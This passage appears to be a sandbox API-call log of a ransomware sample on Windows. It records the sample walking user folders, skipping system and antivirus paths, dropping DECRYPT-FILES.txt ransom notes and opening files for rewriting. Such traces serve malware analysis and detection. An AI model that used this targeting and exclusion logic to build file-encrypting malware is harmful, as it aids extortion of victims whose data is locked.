ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0077.832] lstrcmpW (lpString1="User Pinned", lpString2=".") returned 1 [0077.832] lstrcmpW (lpString1="User Pinned", lpString2="..") returned 1 [0077.832] lstrcatW (in: lpString1="User Pinned", lpString2="\\" | out: lpString1="User Pinned\\") returned="User Pinned\\" [0077.832] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2="User Pinned\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Program Files") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch=":\\Windows") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Games\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\All Users") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.832] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.833] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="AhnLab") returned 0x0 [0077.833] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.833] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0077.833] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.833] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\jkbimi8.tmp") returned 111 [0077.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0077.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0077.835] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.835] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt") returned 117 [0077.835] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0077.837] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0077.838] CloseHandle (hObject=0x45c) returned 1 [0077.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0077.839] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0077.839] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0077.839] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.839] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.839] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.839] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.839] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.839] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.839] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf98cef90, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0077.839] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0077.839] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0077.839] lstrcatW (in: lpString1="ImplicitAppShortcuts", lpString2="\\" | out: lpString1="ImplicitAppShortcuts\\") returned="ImplicitAppShortcuts\\" [0077.839] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Program Files") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch=":\\Windows") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Games\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\All Users") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.839] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.840] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="AhnLab") returned 0x0 [0077.840] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.840] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0077.840] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.840] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\jkbimi8.tmp") returned 132 [0077.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0077.841] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.841] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt") returned 138 [0077.841] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.843] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.844] CloseHandle (hObject=0x464) returned 1 [0077.844] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0077.844] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0077.844] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.845] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.845] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.845] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.845] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa98d7a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa98d7a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa98d7a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.845] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.845] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.845] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.845] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.845] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.845] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.845] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.845] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.845] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned 120 [0077.845] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.845] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\" [0077.845] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\jkbimi8.tmp" [0077.845] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.846] CloseHandle (hObject=0x0) returned 0 [0077.846] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.846] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.846] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.846] CloseHandle (hObject=0x460) returned 1 [0077.846] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa967640, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa967640, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa967640, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.846] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.847] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.847] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.847] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.847] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.847] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.847] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.847] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned 99 [0077.847] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.847] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\" [0077.847] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\jkbimi8.tmp" [0077.847] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.847] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff 